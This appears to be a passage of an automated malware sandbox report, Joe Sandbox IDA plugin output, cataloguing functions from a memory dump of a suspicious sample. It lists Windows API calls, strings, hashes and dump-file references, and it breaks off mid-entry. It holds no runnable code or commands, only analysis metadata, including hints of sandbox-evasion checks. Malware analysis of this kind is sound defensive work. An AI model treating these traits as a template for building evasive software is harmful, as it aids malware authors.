                                      • Instruction ID: 16782eab6013530a53e7013d0b613b51c8a51ece05393b0f7aa9838de994f4d1
                                      • Opcode Fuzzy Hash: cf0c614a89c89fbd42bb7df2729c8491c51d8648e8a714787366f1aa53018498
                                      • Instruction Fuzzy Hash: 09913D75A002089FCB14DF68C484EAABBF1FF45318F189099E54ADB362DB31ED85CB91
                                      Function 008AE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                      Download Yara Rule
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 008AE30D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorHandling__start
                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525
                                      • Opcode ID: 93df5703e5282d8914edb16d00e61be9127704b7a154a2bdda008838fbbe9309
                                      • Instruction ID: 683e303d02fe61074f8336874baa3e4e6c8cf4e25666e10737478d289acc5c69
                                      • Opcode Fuzzy Hash: 93df5703e5282d8914edb16d00e61be9127704b7a154a2bdda008838fbbe9309
                                      • Instruction Fuzzy Hash: D1515B61A1C70696EB257718C9013F93BA4FF81B80F344DA8E096C27ADEB348C959A46
                                      Function 0089E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #
                                      • API String ID: 0-1885708031
                                      • Opcode ID: ef133016418862e164d5043b46ce60ea9f8e52c2eeaba700eb0a6fccd44149d0
                                      • Instruction ID: 4a9939e7fc3a79cb8b0b3846cec73a964f71782679485ecf3b84b62771c5d08b
                                      • Opcode Fuzzy Hash: ef133016418862e164d5043b46ce60ea9f8e52c2eeaba700eb0a6fccd44149d0
                                      • Instruction Fuzzy Hash: 7F51FF7590424ADFDF25FFA8C481ABA7BA8FF15310F284156F891DF290DA309D42CBA1
                                      Function 0089F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 0089F2A2
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0089F2BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: 9ab099040d4e7553394bcd03be8ac6e302310781c93a603af1a57842c80bfd0c
                                      • Instruction ID: d50aa858f7faef60eaef66e4d012281af54e627abd0c23015e3968af73d6cbf7
                                      • Opcode Fuzzy Hash: 9ab099040d4e7553394bcd03be8ac6e302310781c93a603af1a57842c80bfd0c
                                      • Instruction Fuzzy Hash: FC51397141C7449BE320AF14E886BABB7F8FF84304F91885DF299911A5EB708529CB67
                                      Function 00905745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009057E0
                                      • _wcslen.LIBCMT ref: 009057EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper_wcslen
                                      • String ID: CALLARGARRAY
                                      • API String ID: 157775604-1150593374
                                      • Opcode ID: 747f20dc73f4e618c03cfb7fee81bd27eb4b9fc63a0d7823437f4121b4647bc6
                                      • Instruction ID: aad8f736a9b8ea95609a5785acd6d032fdea81a7fe842f6e3359c32b28ff76d9
                                      • Opcode Fuzzy Hash: 747f20dc73f4e618c03cfb7fee81bd27eb4b9fc63a0d7823437f4121b4647bc6
                                      • Instruction Fuzzy Hash: AB419F71A006099FCB14EFA9C8819BEBBF9FF59314F158069E905E72A1E7309D81CF91
                                      Function 008FD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 008FD130
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008FD13A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CrackInternet_wcslen
                                      • String ID: |
                                      • API String ID: 596671847-2343686810
                                      • Opcode ID: 04aab07dd3a5761484528a9c0e352b2025776c56fbe2a552afae2413761b83fc
                                      • Instruction ID: 59f5c339be94f8e4ce18100d05ee0c9578b324890aa2df0e427ee09960bcb0f2
                                      • Opcode Fuzzy Hash: 04aab07dd3a5761484528a9c0e352b2025776c56fbe2a552afae2413761b83fc
                                      • Instruction Fuzzy Hash: 0F311A71D00219ABDF15EFA8CC85AEEBFBAFF05300F100019F915E6162E731AA56DB61
                                      Function 0091356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 00913621
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0091365C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: cdf5882d0baaee248dc24551dfdb8654dde7eca8e5c48e904464cbe30760e916
                                      • Instruction ID: 7991707a95feb25cb0a1634d15c2d2a7601fbb216da6627133ab3907b8287089
                                      • Opcode Fuzzy Hash: cdf5882d0baaee248dc24551dfdb8654dde7eca8e5c48e904464cbe30760e916
                                      • Instruction Fuzzy Hash: 8E318E71210608AADB109F28DC41AFB73BDFF88764F108619F9A5D7280DA30AD91D760
                                      Function 00914537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0091461F
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00914634
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: fc1906a7f2ed7fc1156310f625c1699d12aeabe23fdb2798bd885fe4454e521f
                                      • Instruction ID: 1fb1b64fe0e85c180b20168d2eb532f4ea4349ccba331bc6429d70d2ed57a9c7
                                      • Opcode Fuzzy Hash: fc1906a7f2ed7fc1156310f625c1699d12aeabe23fdb2798bd885fe4454e521f
                                      • Instruction Fuzzy Hash: 28310774B0130E9FDB14CF69C990BDA7BBAFB49344F14406AE905AB351D770A941CF90
                                      Function 009131EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0091327C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00913287
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 69d4a67fdf97f062d612eabcf60ad5d7823b15f2f7a5d37da5a881d450b0aff5
                                      • Instruction ID: b758d0258baba9330142fdf2311b3f4814b59045720623a0933a98db28d7f748
                                      • Opcode Fuzzy Hash: 69d4a67fdf97f062d612eabcf60ad5d7823b15f2f7a5d37da5a881d450b0aff5
                                      • Instruction Fuzzy Hash: 3111B67130420C7FEF21AE54DC80EFB376EEB94364F108524F92497290D6319D919760
                                      Function 00913710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0088600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0088604C
                                        • Part of subcall function 0088600E: GetStockObject.GDI32(00000011), ref: 00886060
                                        • Part of subcall function 0088600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0088606A
                                      • GetWindowRect.USER32(00000000,?), ref: 0091377A
                                      • GetSysColor.USER32(00000012), ref: 00913794
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 8e40f1e9beeac6c260735ebbe9695dbda73b33f2b72db10db9359ff881723b76
                                      • Instruction ID: f9fedc3a09c20bb701e76718b3074b82066af5e3c6690447b5c2a9f423d75624
                                      • Opcode Fuzzy Hash: 8e40f1e9beeac6c260735ebbe9695dbda73b33f2b72db10db9359ff881723b76
                                      • Instruction Fuzzy Hash: 1D113AB2650209AFDF01DFA8CC45EEA7BF8FB08354F004914F955E2250E735E851DB50
                                      Function 008FCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008FCD7D
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008FCDA6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: 58245625bfef9f011597e8c724fa83098c9e0b219ab66a666dd441d183fbe637
                                      • Instruction ID: 91591af698a533151fdcd47e9516a38214cc2ffb2895b0ec32425d5cea90f161
                                      • Opcode Fuzzy Hash: 58245625bfef9f011597e8c724fa83098c9e0b219ab66a666dd441d183fbe637
                                      • Instruction Fuzzy Hash: CC11A3B125563DBAD7246A768C45EFBBEA8FF127A8F004226B209C2080D6709A41D6F0
                                      Function 00913429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 009134AB
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009134BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 10f7d99ef7ba8fd96a5e5dcb5328f983c540c72e3a314611fde40a7c408d9223
                                      • Instruction ID: 0b161a7c5d5213dc2a969b7f5a470fd44ceec544436e48bda2f928ba0fc9b14c
                                      • Opcode Fuzzy Hash: 10f7d99ef7ba8fd96a5e5dcb5328f983c540c72e3a314611fde40a7c408d9223
                                      • Instruction Fuzzy Hash: 03116D71210208AAEB228E64DC44AEB376EEB55378F508724FA65931E0C775DC91A750
                                      Function 008E6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • CharUpperBuffW.USER32(?,?,?), ref: 008E6CB6
                                      • _wcslen.LIBCMT ref: 008E6CC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: STOP
                                      • API String ID: 1256254125-2411985666
                                      • Opcode ID: 26e1a9d695c5a24dee322f077291a8d89bccc942ad275be6be1b47eeae0467cd
                                      • Instruction ID: 211817197b1def66b3126ee0fd63fc85f4bfe34a3ab61405e70b64138ae7c77a
                                      • Opcode Fuzzy Hash: 26e1a9d695c5a24dee322f077291a8d89bccc942ad275be6be1b47eeae0467cd
                                      • Instruction Fuzzy Hash: 11010432B1456B8BCB20AFBECC809BF77A5FB727947500528E852D2191FA32D920C750
                                      Function 008E1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 008E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008E3CCA
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008E1D4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      • Opcode ID: 048c7885b770627562b270f7ea752bf39c7229a6bce76bf064008656348607de
                                      • Instruction ID: bbe9e8c88e7dbafa4fdd38464bc496deabb9d38a3b3be801619f88dde7bc3131
                                      • Opcode Fuzzy Hash: 048c7885b770627562b270f7ea752bf39c7229a6bce76bf064008656348607de
                                      • Instruction Fuzzy Hash: E701B171701219ABCF18FBA9CC59CFE73A8FB47354B140619F872E72C2EA3199088761
                                      Function 008E1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 008E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008E3CCA
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 008E1C46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      • Opcode ID: 70dc0764233042aa00965e1b530edadcd8198d2fdcd36844702eaeb53cbb66b8
                                      • Instruction ID: 2ddfb49ca48e74dab883bf03306b5a3523b6295012497e43d2029c9aac877d64
                                      • Opcode Fuzzy Hash: 70dc0764233042aa00965e1b530edadcd8198d2fdcd36844702eaeb53cbb66b8
                                      • Instruction Fuzzy Hash: 9001B1716811486BCF14EB95C9599FF73A8EB12340B240029E446E3282EA219E0887B2
                                      Function 008E1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 008E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 008E3CCA
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 008E1CC8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 624084870-1403004172
                                      • Opcode ID: 73bba2676420b6de1be076da7b875859621be2291dfa195253e09f5228ece3d6
                                      • Instruction ID: 084e08f598433b741adbf793194a4223b3584ed5d3bb7ad57f0ac386847e7949
                                      • Opcode Fuzzy Hash: 73bba2676420b6de1be076da7b875859621be2291dfa195253e09f5228ece3d6
                                      • Instruction Fuzzy Hash: 5001677568115967CF14F795CA15EFE77A8FB12344B240015B842F3281EA719F08D772
                                      Function 0090747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
